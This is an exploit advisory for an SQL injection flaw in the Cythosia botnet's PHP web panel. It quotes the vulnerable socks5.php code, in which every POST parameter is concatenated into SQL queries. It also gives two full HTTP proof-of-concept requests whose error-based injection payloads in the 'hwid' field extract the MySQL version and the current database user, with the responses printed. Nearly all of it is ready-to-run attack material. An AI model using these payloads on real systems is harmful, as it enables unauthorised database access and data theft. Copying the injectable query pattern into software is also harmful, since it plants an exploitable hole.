Cythosia Botnet SQL-Injection Vulnerability

1. ##########################################################################
2. # Exploit Title: Cythosia Botnet SQL-Injection Vulnerability
3. # Date: 11.12.2013
4. # Exploit Author: GalaxyAndroid
5. # Vendor Homepage: unkn0wn
6. # Application Screenshots
7. http://www.xylibox.com/2012/08/cythosia-botnet-vnloader.html
8. # Version: 2.x
9. # Tested on: Windows 7 with Xampp
10. # greets goes to: ChrisKSK, Protestants in Ukraine -> keep pushing!
11. # no greets to: NSA, GCHQ, USA, AUS, CAN, GBR, NZL
12. #################################Vuln-Code###################################
13. # Vuln-Code:
14. #All POST-Parameters in the file "socks5.php" are vuln against
15. SQL-Injection
16. #
17. #if(!empty($_POST['hwid']) && !empty($_POST['cn']) &&
18. !empty($_POST['ip']) && !empty($_POST['port']))
19. # {
20. # $query = mysql_query("SELECT * FROM hydra_socks WHERE hwid =
21. '".$_POST['hwid']."'");
22. # if(mysql_num_rows($query) >= 1)
23. # {
24. # $sql = mysql_query("UPDATE hydra_socks SET ip =
25. '".$_POST['ip']."', port = '".$_POST['port']."' WHERE hwid =
26. '".$_POST['hwid']."'");
27. # }
28. # else
29. # {
30. # $sql = mysql_query("INSERT INTO hydra_socks (`hwid`,
31. `country`, `ip`, `port`) VALUES ('".$_POST['hwid']."',
32. '".$_POST['cn']."', '".$_POST['ip']."', '".$_POST['port']."')");
33. # }
34. # if(!$sql)
35. # {
36. # echo "fail";
37. # echo mysql_error();
38. # }
39. ##############################Exploit########################################
40. #
41. # PoC 1 - Gets the MySQL Version Information:
42. POST http://127.0.0.1/cythosia/Webpanel/socks5.php HTTP/1.1
43. Host: 127.0.0.1
44. Content-Type: application/x-www-form-urlencoded
45. Content-Length: 322
46. Accept: */*
47. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1;
48. .NET CLR 2.0.50727) Miauu
49. Connection: Close
50.  
51. hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cversion%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test
52. Response:
53. Warning: mysql_num_rows() expects parameter 1 to be resource,
54. boolean given in C:xamppneuhtdocscythosiaWebpanelsocks5.php on line 11
55. failDuplicate entry '~'5.5.32'~1' for key 'group_key'
56. # PoC 2 - whoami?
57.  
58. POST /cythosia/Webpanel/socks5.php HTTP/1.1
59. Host: 127.0.0.1
60. Content-Type: application/x-www-form-urlencoded
61. Content-Length: 319
62. Accept: */*
63. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1;
64. .NET CLR 2.0.50727)
65. Connection: Close
66.  
67. hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cuser%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test
68. Response:
69. Warning: mysql_num_rows() expects parameter 1 to be resource, boolean
70. given in C:xampphtdocscythosiaWebpanelsocks5.php on line 11
71. failDuplicate entry '~'root@localhost'~1' for key 'group_key'
72.  
73. ############################################################################